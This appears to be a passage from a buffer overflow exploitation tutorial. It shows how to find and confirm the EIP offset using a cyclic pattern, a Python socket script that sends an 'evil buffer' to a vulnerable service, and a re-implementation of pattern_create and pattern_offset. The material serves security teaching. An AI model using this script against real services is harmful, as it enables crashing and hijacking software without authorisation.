Finding the offset

Generate a cyclic pattern roughly 400 bytes longer than the buffer length at which the application crashed during fuzzing (for a crash at 2000 bytes, a 2400-byte pattern). Because every 4-byte window of the pattern is unique, the value that ends up in EIP identifies exactly which bytes of the buffer overwrote it.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

Example script that sends the generated pattern to the vulnerable service (paste the pattern into payload):

import socket

# Placeholders kept from the original; fill them in before running.
ip = "<target ip>"
port = int("<target port>")

prefix = "<command to test> "  # the vulnerable command, followed by a space
offset = 0                     # unknown for now; set once pattern_offset reports it
overflow = "A" * offset
retn = ""                      # later: "BBBB" to confirm the offset
padding = ""
payload = "<generated cyclic pattern from pattern_create.rb>"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # latin-1 maps each character to a single byte, so the pattern is sent unchanged
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except socket.error as e:
    print(f"Could not connect: {e}")
finally:
    s.close()

Confirming the offset

Look up the EIP value from the crash with pattern_offset.rb to get the offset, then set offset to that value and retn to "BBBB" in the script. If the offset is correct, the debugger now shows EIP = 42424242 (the ASCII bytes of "BBBB"); any other value means the offset is wrong and needs adjusting.
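As an added example (not the original script and not Metasploit's own code), the same Aa0Aa1... pattern scheme re-implemented in Python, so the pattern can be generated and the crashing EIP value mapped back to an offset without the Ruby tools. The EIP value used at the bottom is a constructed one for illustration.

```python
import string
from typing import Optional

# Added example: re-implementation of the pattern_create / pattern_offset
# scheme (uppercase, lowercase, digit triplets) referenced on this page.


def pattern_create(length: int) -> str:
    """Build the cyclic pattern: every upper/lower/digit triplet is unique,
    so any 4-byte window identifies its own position in the buffer."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # 26*26*10 triplets = 20280 bytes before the pattern would repeat
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, eip_hex: str) -> Optional[int]:
    """Map the EIP value shown by the debugger (e.g. '6F43396E') back to the
    byte offset in the pattern. x86 is little-endian, so the register shows
    the four overwriting bytes in reverse order; both orders are tried.
    Returns None when the value does not come from the pattern at all."""
    raw = bytes.fromhex(eip_hex.lower().removeprefix("0x"))
    for needle in (raw[::-1], raw):
        idx = pattern.find(needle.decode("latin-1"))
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    pat = pattern_create(2400)
    # Constructed EIP value; with this scheme it corresponds to offset 1978
    print(pattern_offset(pat, "6F43396E"))
```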